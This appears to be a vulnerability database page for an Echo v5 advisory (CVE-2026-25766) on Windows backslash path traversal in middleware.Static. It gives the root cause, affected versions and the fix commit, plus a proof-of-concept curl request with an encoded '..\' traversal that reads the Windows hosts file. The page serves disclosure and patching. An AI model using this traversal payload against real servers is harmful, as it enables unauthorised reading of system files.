GHSA-PGVM-WXW2-HRV9

Vulnerability from github – Published: 2026-02-17 18:53 – Updated: 2026-02-19 21:30
VLAI?
Summary
Echo has a Windows path traversal via backslash in middleware.Static default filesystem
Details

Summary

On Windows, Echo’s middleware.Static using the default filesystem allows path traversal via backslashes, enabling unauthenticated remote file read outside the static root.

Details

In middleware/static.go, the requested path is unescaped and normalized with path.Clean (URL semantics). path.Clean does not treat \ as a path separator, so ..\ sequences remain in the cleaned path. The resulting path is then passed to currentFS.Open(...). When the filesystem is left at the default (nil), Echo uses defaultFS which calls os.Open (echo.go:792). On Windows, os.Open treats \ as a path separator and resolves ..\, allowing traversal outside the static root.

Relevant code: - middleware/static.go (path unescape + path.Clean + currentFS.Open) - echo.go defaultFS.Openos.Open

This is the same class as CVE-2020-36565 (fixed in v4 by switching to OS-aware cleaning), but in v5 the path.Clean + defaultFS combination reintroduces the Windows backslash traversal.

PoC

Windows only.

Sample code (main.go): ```go package main

import ( "log" "net/http"

    "github.com/labstack/echo/v5"
    "github.com/labstack/echo/v5/middleware"

)

func main() { e := echo.New()

    // Important: use middleware.Static with default filesystem (nil)
    e.Use(middleware.Static("public"))

    e.GET("/healthz", func(c *echo.Context) error {
            return c.String(http.StatusOK, "ok")
    })

    addr := ":1323"
    log.Printf("listening on %s", addr)
    if err := e.Start(addr); err != nil && err != http.ErrServerClosed {
            log.Fatal(err)
    }

} ``` Static file:

public/index.html

(content can be any HTML)

Run: go run .

Verify:

curl http://localhost:1323/index.html curl --path-as-is "http://localhost:1323/..%5c..%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts" Expected: 404

Screenshot: image image

### Impact Path traversal leading to arbitrary file read outside the static root. Any unauthenticated remote user can read local files that the Echo process has access to on Windows, if middleware.Static is used with the default filesystem.

Severity ?
5.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/labstack/echo/v5"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25766"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-17T18:53:58Z",
    "nvd_published_at": "2026-02-19T16:27:15Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nOn Windows, Echo\u2019s `middleware.Static` using the default filesystem allows path traversal via backslashes, enabling\nunauthenticated remote file read outside the static root.\n\n### Details  \n\n  In `middleware/static.go`, the requested path is unescaped and normalized with `path.Clean` (URL semantics).\n  `path.Clean` does **not** treat `\\` as a path separator, so `..\\` sequences remain in the cleaned path. The resulting\n  path is then passed to `currentFS.Open(...)`. When the filesystem is left at the default (nil), Echo uses `defaultFS`\n  which calls `os.Open` (`echo.go:792`). On Windows, `os.Open` treats `\\` as a path separator and resolves `..\\`,\n  allowing traversal outside the static root.\n\n  Relevant code:\n  - `middleware/static.go` (path unescape + `path.Clean` + `currentFS.Open`)\n  - `echo.go` `defaultFS.Open` \u2192 `os.Open`\n\n  This is the same class as CVE-2020-36565 (fixed in v4 by switching to OS-aware cleaning), but in v5 the `path.Clean`\n  + defaultFS combination reintroduces the Windows backslash traversal.\n\n\n### PoC\n Windows only.\n\n  **Sample code (main.go):**\n  ```go\n  package main\n\n  import (\n        \"log\"\n        \"net/http\"\n\n        \"github.com/labstack/echo/v5\"\n        \"github.com/labstack/echo/v5/middleware\"\n  )\n\n  func main() {\n        e := echo.New()\n\n        // Important: use middleware.Static with default filesystem (nil)\n        e.Use(middleware.Static(\"public\"))\n\n        e.GET(\"/healthz\", func(c *echo.Context) error {\n                return c.String(http.StatusOK, \"ok\")\n        })\n\n        addr := \":1323\"\n        log.Printf(\"listening on %s\", addr)\n        if err := e.Start(addr); err != nil \u0026\u0026 err != http.ErrServerClosed {\n                log.Fatal(err)\n        }\n  }\n ```\n  Static file:\n\n  public/index.html\n\n  (content can be any HTML)\n\n  **Run:**\n  go run .\n\n  **Verify:**\n\n  curl http://localhost:1323/index.html\n  curl --path-as-is \"http://localhost:1323/..%5c..%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts\"\n  Expected: 404  \n\n  **Screenshot:**\n\u003cimg width=\"884\" height=\"689\" alt=\"image\" src=\"https://github.com/user-attachments/assets/acb14d70-2a43-47c1-8927-2f3da491a853\" /\u003e\n\u003cimg width=\"1022\" height=\"162\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f2b92aa2-541e-461d-81a2-8a5907d7a447\" /\u003e\n\n\n\n  ### Impact\n  Path traversal leading to arbitrary file read outside the static root. Any unauthenticated remote user can\n  read local files that the Echo process has access to on Windows, if `middleware.Static` is used with the default\n  filesystem.",
  "id": "GHSA-pgvm-wxw2-hrv9",
  "modified": "2026-02-19T21:30:02Z",
  "published": "2026-02-17T18:53:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/labstack/echo/security/advisories/GHSA-pgvm-wxw2-hrv9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25766"
    },
    {
      "type": "WEB",
      "url": "https://github.com/labstack/echo/pull/2891"
    },
    {
      "type": "WEB",
      "url": "https://github.com/labstack/echo/commit/b1d443086ea27cf51345ec72a71e9b7e9d9ce5f1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/labstack/echo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Echo has a Windows path traversal via backslash in middleware.Static default filesystem"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.